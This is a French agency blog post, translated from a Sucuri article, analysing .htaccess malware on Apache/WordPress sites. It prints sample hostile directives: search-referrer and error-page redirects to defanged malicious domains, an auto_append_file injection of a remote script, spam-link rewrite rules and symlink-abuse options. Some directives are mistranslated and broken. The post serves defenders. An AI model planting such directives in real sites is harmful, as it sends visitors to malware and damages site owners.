Notre Blog

Dernières actus

Comprendre les logiciels malveillants .htaccess

Le fichier .htaccess est connu pour être la cible des hackers. Qu’il s’agisse d’utiliser le fichier pour cacher des logiciels malveillants, rediriger les moteurs de recherche vers d’autres sites avec des tactiques de référencement clandestines, cacher des portes dérobées, injecter du contenu, modifier les valeurs du fichier php.ini, les possibilités sont infinies.

De nombreux propriétaires de sites ignorent l’existence de ce fichier, car il commence par un « . », ce qui en fait un fichier caché. Les logiciels malveillants .htaccess peuvent être difficiles à localiser et à nettoyer sur un serveur, car ils vous permettent d’apporter de multiples modifications au serveur Web et à son comportement.

Qu’est-ce qu’un fichier .htaccess ?

Le fichier .htaccess est un fichier très important et puissant, spécifique aux environnements de serveurs Apache. Il permet aux administrateurs Web d’apporter des modifications à l’environnement dans son ensemble, ou par répertoire. Il peut autoriser ou refuser l’accès à certaines adresses IP, référents et agents utilisateurs.

Il est également utilisé pour activer des choses comme les « jolis permaliens » dans les environnements WordPress avec l’utilisation de mod_rewrite. Il s’agit d’un fichier très polyvalent, utile et puissant, et c’est précisément la raison pour laquelle les attaquants utiliseront ce fichier à mauvais escient pour atteindre leurs propres objectifs.

Malware de redirection .htaccess

L’une des attaques les plus courantes que nous avons rencontrées concerne les redirections .htaccess. Cela redirige les utilisateurs des moteurs de recherche vers des logiciels malveillants en utilisant le jeu d’instructions suivant :

RewriteEngine On

 

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*ask.* [OR]

RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]

RewriteCond %{HTTP_REFERER} .*baidu.* [OU]

..

RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]

RewriteCond %{HTTP_REFERER} .*flickr.*

RewriteRule ^(.*)$ hxxp://villusoftreit[.]ru/in.cgi?3 [R=301,L] 

Ce script vérifie le référent de toute personne visitant le site à partir des moteurs de recherche répertoriés, puis redirige l’utilisateur vers une page contenant un malware. (I.E. hxxp://villusoftreit[.]ru/in.cgi?3) Les propriétaires de sites Web sont plus susceptibles de visiter leur site en entrant le domaine directement dans leur barre d’adresse, plutôt qu’en passant par un moteur de recherche. Il est donc peu probable que le propriétaire du site remarque l’infection avant d’en être informé par quelqu’un.

Voici un autre exemple de redirection .htaccess, sauf qu’avant la publication, il y avait des centaines d’espaces blancs avant le « RewriteCond », ce qui le rend plus difficile à trouver dans un éditeur de texte :

RewriteEngine On

 

RewriteOptions inherit

RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]

RewriteRule .* hxxp://globalpoweringgatheringon[.]com/in.php?n=30 [R,L] 

Un autre type d’attaque courante impliquant le fichier .htaccess consiste à rediriger les pages d’erreur vers des logiciels malveillants, ce qui peut être encore plus difficile à détecter. En effet, la majeure partie du site Web fonctionne normalement. La redirection ne se déclenchera que sur les pages inexistantes. Voici un exemple de ce que l’on peut trouver avec ce type d’attaque :

RewriteEngine On

 

ErrorDocument 400 hxxp://powercrystal[.]ru/inject/index.php

ErrorDocument 401 hxxp://powercrystal[.]ru/inject/index.php

ErrorDocument 403 hxxp://powercrystal[.]ru/inject/index.php

ErrorDocument 404 hxxp://powercrystal[.]ru/inject/index.php

ErrorDocument 500 hxxp://powercrystal[.]ru/inject/index.php 

Autre exemple :

ErrorDocument 400 hxxp://arthurlundt.cz[.]cc/ht_er_docs/

ErrorDocument 403 hxxp://arthurlundt.cz[.]cc/ht_er_docs/

[...tronqué...]

ErrorDocument 404 hxxp://nicomagen.cz[.]cc/ht_er_docs/

ErrorDocument 405 hxxp://nicomagen.cz[.]cc/ht_er_docs/ 

(Mauvaise) utilisation de auto_append_file

Nous avons également remarqué que les attaquants ajoutent des logiciels malveillants au site en modifiant la valeur PHP « auto_append_file » pour charger les logiciels malveillants à partir d’un emplacement caché, au lieu de les rediriger via un fichier .htaccess. Par exemple :

 

php_value auto_append_file "/tmp/13063671977873.php" 

Le contenu de « /tmp/13063671977873.php » est ajouté à chaque fichier PHP, ce qui donnera quelque chose comme ceci :

 

<script src="hxxp://nicomagen.cz[.]cc/jquery.js"></script> 

 

Il s’agit d’un malware javascript commun que nous voyons dans de nombreux types d’infections différentes, allant des redirections malveillantes aux scanneurs de cartes de crédit. Périodiquement, les attaquants changent les domaines malveillants utilisés afin d’éviter la détection. Cette opération est généralement effectuée pour chaque site à l’aide d’une liste de blocage.

 

.htaccess utilisé pour générer des liens de spam

Une autre façon dont nous avons vu le fichier .htaccess utilisé de manière abusive est la génération de liens de spam :

BEGIN WordPress

 

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]$ index.php?smsite=$2&smid=$1 [L]

RewriteBase /

RewriteRule ^index\.php$ - [L]

RewriteCond %{REQUEST_FILENAME} !-f

Réécriture du critère %{REQUEST_FILENAME} !-f !-d

RewriteRule . /index.php [L]

</IfModule>

Ce malware utilise une expression régulière qui, associée à un malware de spam dans la structure du fichier, peut générer des centaines de liens de spam sur le site Web. Cela apparaîtra ensuite dans les résultats de recherche de Google et d’autres moteurs de recherche et nuira au référencement du site Web.

.htaccess utilisé avec des bombes symlink

Une attaque très courante dans les environnements WHM/cPanel est l’utilisation abusive de liens symboliques. Si la protection contre les liens symboliques est désactivée dans WHM, les attaquants peuvent utiliser les liens symboliques pour se déplacer latéralement dans l’environnement et infecter d’autres sites Web ou simplement créer un flot de liens symboliques spammy aléatoires répartis dans la structure des fichiers.

Ceci est rendu possible en partie grâce à l’utilisation d’un fichier .htaccess placé dans le répertoire en question :

 

Options +FollowSymLinks

RépertoireIndex Index.html

Options +Index

AddType texte/plain .php

AddHandler server-parsed .php

Le serveur recevra ainsi l’ordre de suivre les liens symboliques jusqu’à leur destination et aidera les attaquants à diffuser leurs logiciels malveillants dans l’environnement.

Malware de nuisance

L’utilisation abusive des fichiers .htaccess pour interdire l’accès aux fichiers d’un site Web est une autre attaque fréquente ces derniers temps. Par exemple, nous avons vu des attaquants jeter des centaines, ou parfois des milliers de fichiers .htaccess dans toute la structure de fichiers du site Web avec les éléments suivants :

 

    <FilesMatch ‘.(php|php5|phtml)$’>

    Order allow,deny

    Deny from all

    </FilesMatch>

Il s’agit d’un fichier .htaccess très simple qui ne fait rien d’autre qu’empêcher l’exécution de php.

 

Ce fichier peut fonctionner comme une mesure de renforcement lorsqu’il est placé dans un répertoire tel que ./wp-content/uploads. Cependant, lorsqu’il est disséminé dans l’ensemble de la structure de fichiers, il peut perturber la fonctionnalité du site Web et rendre le panneau wp-admin inutile. Pour ce faire, il empêche l’administrateur du site Web d’effectuer des opérations de maintenance, des mises à jour ou de mettre hors service l’ensemble du site.

 

Détection et réponse

Si vous pensez que votre site a été attaqué ou n’est pas protégé, découvrez notre pack :

Cet article a été traduit d’un article en anglais : Sucuri

MidJourney : Une révolution dans la création d'images par IA
Infographie "chiffres clés du E-commerce en France en 2023"
X